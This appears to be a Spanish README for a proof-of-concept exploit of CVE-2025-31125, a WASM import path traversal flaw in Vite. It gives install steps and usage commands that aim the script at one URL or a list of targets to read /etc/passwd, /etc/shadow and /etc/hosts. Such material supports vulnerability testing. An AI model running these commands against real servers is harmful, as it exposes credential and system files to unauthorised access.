
Vite WASM Recorrido de Rutas de Importación 🛡️
Este script es un exploit prueba de concepto (PoC) para CVE-2025-31125, una vulnerabilidad encontrada en Vite. El exploit aprovecha un problema de WASM Import Path Traversal para recuperar archivos sensibles de servidores vulnerables que ejecutan el framework Vite. Permite a los atacantes acceder a archivos como /etc/passwd, /etc/shadow, /etc/hosts y otros archivos sensibles expuestos por el servidor. ⚠️
Esta herramienta es solo con fines educativos y solo debe utilizarse en sistemas que poseas o para los que tengas permiso explícito de prueba. El acceso no autorizado a sistemas es ilegal y puede tener consecuencias legales. ¡Usa esta herramienta responsablemente! ⚖️
/etc/passwd, /etc/shadow, ¡y más! 💻requests 📦urllib3 🔒toilet (opcional, para el banner) 🎨pip3 install -r requirements.txt
Para instalar toilet (opcional para banner) en tu sistema:
sudo apt install toiletbrew install toiletgit clone https://github.com/0xgh057r3c0n/CVE-2025-31125.git
cd CVE-2025-31125
pip3 install -r requirements.txt
Para usar el script, proporciona ya sea una URL objetivo única usando -u o un archivo con múltiples URLs objetivo usando -f.
-u, --url: Apunta a una sola URL. 🌐-f, --file: Proporciona un archivo con una lista de URLs objetivo (una por línea). 📄--path: Especifica la ruta a explotar (ej., /etc/passwd, /etc/shadow). El valor predeterminado es /etc/passwd. 🛠️--no-verify: Desactiva la verificación SSL (útil para certificados autofirmados). 🔒/etc/passwd)python3 exploit.py -u https://example.com --no-verify
/etc/shadow)python3 exploit.py -u https://example.com --no-verify --path /etc/shadow
/etc/passwd)python3 exploit.py -f targets.txt --no-verify
/etc/hosts)python3 exploit.py -f targets.txt --no-verify --path /etc/hosts
🙋♂️ Contacto (Para colaboración, investigación y discusiones de ciberseguridad):
Este proyecto está bajo la Licencia MIT. 🌟
